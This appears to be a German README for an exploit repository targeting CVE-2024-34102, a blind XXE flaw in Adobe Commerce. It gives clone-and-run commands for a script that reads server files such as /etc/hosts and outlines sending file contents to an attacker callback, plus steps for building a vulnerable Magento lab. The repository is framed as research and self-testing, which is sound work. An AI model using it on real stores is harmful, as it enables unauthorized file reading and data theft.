
Adobe Commerce XXE exploit
★ Dank an @th3gokul, Sanjaith3hacker, Chocapikk für die ursprüngliche Codebasis. ★
CVE-2024-34102 : Adobe Commerce XXE-Schwachstelle Beschreibung: Adobe Commerce Versionen 2.4.7, 2.4.6-p5, 2.4.5-p7, 2.4.4-p8 und früher sind von einer Schwachstelle aufgrund unzureichender Einschränkung von XML-External-Entity-Referenzen ('XXE') betroffen, die zu beliebiger Codeausführung führen kann. Ein Angreifer könnte diese Schwachstelle ausnutzen, indem er ein präpariertes XML-Dokument sendet, das auf externe Entitäten verweist. Die Ausnutzung dieses Problems erfordert keine Benutzerinteraktion.
git clone https://github.com/EQSTSeminar/CVE-2024-34102.git
cd CVE-2024-34102
pip install -r requirements.txt
python CVE-2024-34102.py -u <URL_TO_EXPLOIT> -f <FILE_TO_READ>
python CVE-2024-34102.py https://magento.test -f /etc/hosts

Dank der Docker-Konfiguration von markshust für Magento ist es nicht schwer, die verwundbare Entwicklungsumgebung zu erstellen. https://github.com/markshust/docker-magento
# Create your project directory then go into it:
mkdir /opt/magento
cd $_
# Install some stuff (needed for the script)
sudo apt update
sudo apt install -y bc curl
# Create Composer's directory (to avoid a weird error)
mkdir /var/www/.composer/
# Run this automated one-liner from the directory you want to install your project.
curl -s https://raw.githubusercontent.com/markshust/docker-magento/release/next/lib/onelinesetup | bash -s -- magento.test 2.4.7 community
# Submit credentials when needed.
# Edit hosts file
echo "127.0.0.1 magento.test" >> /etc/hosts

Sie können Ihr Magento mit PHPSTORM debuggen.
bin/xdebug enable

..Und dann können Sie Ihr Magento debuggen.
Erstellen Sie eine Callback-URL (mocky api) -> Blind-XXE-Angriff (CVE-2024-34102) -> Senden Sie Dateiinhalte an die Instanz des Angreifers (SSRFUtility) -> Lesen Sie die Instanz des Angreifers (SSRFUtility)
Dieses Repository ist nicht als XXE-Exploit für CVE-2024-34102 gedacht. Der Zweck dieses Projekts ist es, Menschen dabei zu helfen, diese Schwachstelle zu verstehen und möglicherweise ihre eigenen Anwendungen zu testen.
Wir veröffentlichen einmal im Monat CVE- und Malware-Analysen. Wenn Sie interessiert sind, folgen Sie bitte den untenstehenden Links, um unsere Veröffentlichungen zu sehen. https://www.skshieldus.com/eng/business/insight.do